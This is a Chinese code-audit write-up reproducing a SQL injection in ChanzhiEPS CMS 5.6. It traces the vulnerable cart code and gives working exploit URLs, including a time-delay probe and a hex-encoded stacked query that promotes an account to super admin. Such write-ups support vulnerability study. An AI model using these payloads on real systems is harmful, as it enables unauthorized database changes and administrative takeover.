[复现]蝉知cms 5.6 前台注入+getshell

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[复现]蝉知cms 5.6 前台注入+getshell相关的知识,希望对你有一定的参考价值。

https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5

前台注入

在/chanzhieps/system/module/cart/control.php页面的add函数

public function add($product, $count)
    {
        if($this->app->user->account == ‘guest‘)
        {
            /* Save info to cookie if user is guest. */
            $this->cart->addInCookie($product, $count);
            $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess)); 
        }
        else
        {
            $result = $this->cart->add($product, $count);
            if($result) $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess));
            $this->send(array(‘result‘ => ‘fail‘, ‘message‘ => dao::getError()));
        }
}

public function add($product, $count) $count是用户输入
我们看会员登录以后的,也就是

$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php

public function add($productID, $count)
    {
        $hasProduct = $this->dao->select(‘count(id) as count‘)->from(TABLE_CART)->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->fetch(‘count‘);

        if(!$hasProduct)
        {
            $product = new stdclass();
            $product->product = $productID;
            $product->account = $this->app->user->account;
            $product->count   = $count;
            $this->dao->insert(TABLE_CART)->data($product)->exec();
        }
        else
        {
            $this->dao->update(TABLE_CART)->set("count= count + {$count}")->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->exec();
        }

        return !dao::isError();
}

如果能查到产品的话,更新数量set("count= count + {$count}")
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php

public function set($set)
    {
        /* Add ` to avoid keywords of mysql. */
        if(strpos($set, ‘=‘) ===false)
        {
            $set = str_replace(‘,‘, ‘‘, $set);
            $set = ‘`‘ . str_replace(‘`‘, ‘‘, $set) . ‘`‘;
        }

        $this->sql .= $this->isFirstSet ? " $set" : ", $set";
        if($this->isFirstSet) $this->isFirstSet = false;
        return $this;
}

可以看到直接进入了$this->sql
测试一下

http://localhost/www/index.php/cart-add-1-(select%20sleep(10))

成功进行延时操作

这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行

http://localhost/www/index.php/cart-add-1-1;set%[email protected]=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%[email protected];execute%20x;select%201%20union%20select%201

update一下 将低权限账户提升至super

进入后台






以上是关于[复现]蝉知cms 5.6 前台注入+getshell的主要内容,如果未能解决你的问题,请参考以下文章

漏洞|74cms 3.6 前台SQL注入+Python脚本小练习

74cms v5.0.1 前台sql注⼊复现

超级cms2.39-任意代码执行漏洞

蝉知cms的一些调研(20200411前)

极致CMS两处漏洞复现/存储xss/文件上传Getshell

堕落小白的前台sql注入cms代码审计